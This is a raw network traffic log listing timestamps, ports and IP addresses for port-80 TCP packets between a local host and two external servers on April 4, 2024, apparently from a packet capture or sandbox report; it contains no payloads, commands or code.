Apr 4, 2024 17:49:05.377279997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377348900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377388954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377428055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377461910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377482891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377546072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377578974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377582073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377636909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377654076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377665997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377676964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377679110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377705097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377722979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377737045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377763987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377799988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377813101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377825022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377852917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377862930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377872944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377876043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377912998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.377931118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.377969980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378011942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378031969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378047943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378072023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378082991 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378084898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378109932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378122091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378153086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378166914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378190041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378227949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378241062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378252983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378267050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378273964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378298998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378299952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378361940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378375053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378396988 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378412008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378421068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378433943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378446102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378458977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378470898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378470898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378485918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378496885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378499985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378514051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378524065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378557920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378570080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378582954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378604889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378645897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378676891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378689051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378725052 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378793001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378820896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378828049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378895998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378909111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378921986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378927946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.378956079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.378962994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.379023075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.379056931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.452361107 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.452377081 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.452389002 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.452538013 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.452544928 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.452558041 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.452589989 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.452610970 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.452699900 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.452716112 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.452744007 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.452759027 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.454261065 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454441071 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454453945 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454477072 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454489946 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.454520941 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.454613924 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454626083 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454675913 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.454875946 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454888105 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454926014 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.454977036 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.454991102 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455024004 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455030918 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.455054045 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455060959 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.455065012 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455091953 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.455104113 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.455123901 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455136061 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455162048 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455182076 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.455200911 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455209970 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.455210924 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.455245018 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.455256939 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458455086 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458467960 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458478928 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458491087 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458523989 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458553076 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458623886 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458636999 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458681107 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458741903 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458781004 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458790064 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458794117 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458816051 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458817005 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458836079 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458851099 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458883047 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458894014 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458905935 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458918095 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458931923 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458956003 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.458978891 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.458990097 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459002018 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459012985 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459014893 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.459023952 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459044933 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.459072113 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.459090948 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459105968 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459116936 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459130049 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459141016 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459146976 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.459182978 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.459255934 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459265947 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459302902 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.459371090 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459382057 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459417105 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.459716082 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459913969 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.459958076 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.459981918 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.460099936 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.460150003 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.460454941 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.460468054 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.460479021 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.460500002 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.460529089 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.460617065 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.460766077 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.460813999 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.460835934 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.460872889 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.460943937 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.461003065 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.488428116 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.488461971 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.488475084 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.488534927 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.488584042 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.527801037 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.527878046 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.527892113 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.527961969 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.527975082 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.528022051 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.528135061 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.528147936 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.528187037 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.739835024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.739913940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.739974976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740022898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740047932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740082979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740092993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740202904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740238905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740264893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740334034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740374088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740454912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740534067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740580082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740612030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740628004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740652084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740654945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740708113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740753889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740755081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740802050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740848064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740854979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740869045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740914106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.740922928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.740947962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741025925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741045952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741064072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741086960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741090059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741157055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741204023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741225958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741291046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741344929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741373062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741384983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741427898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741449118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741523981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741538048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741563082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741600990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741641998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741677046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741689920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741780996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741781950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741880894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.741918087 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.741925955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742012024 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.742063046 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.742091894 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.742132902 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.742166042 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.742213011 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.742238998 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.742278099 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:05.742306948 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.742333889 CEST	49731	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:49:05.742364883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742423058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742463112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.742475986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742511988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742541075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.742578030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742618084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742644072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.742670059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742718935 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.742754936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742829084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742866993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.742882967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742930889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742989063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.742996931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.743061066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743073940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743102074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.743113995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743149996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.743160009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743177891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743218899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.743243933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743326902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743371010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.743427992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743539095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743578911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743624926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.743660927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743705034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.743808031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743894100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.743935108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.743957043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744008064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744055986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744090080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744095087 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744133949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744133949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744148970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744188070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744204044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744263887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744299889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744340897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744425058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744466066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744481087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744546890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744606972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744648933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744663954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744707108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744731903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744767904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744806051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744846106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744882107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.744967937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.744971991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745037079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745088100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:05.745126009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:05.745177984 CEST	80	49730	103.23.232.80	192.168.2.10
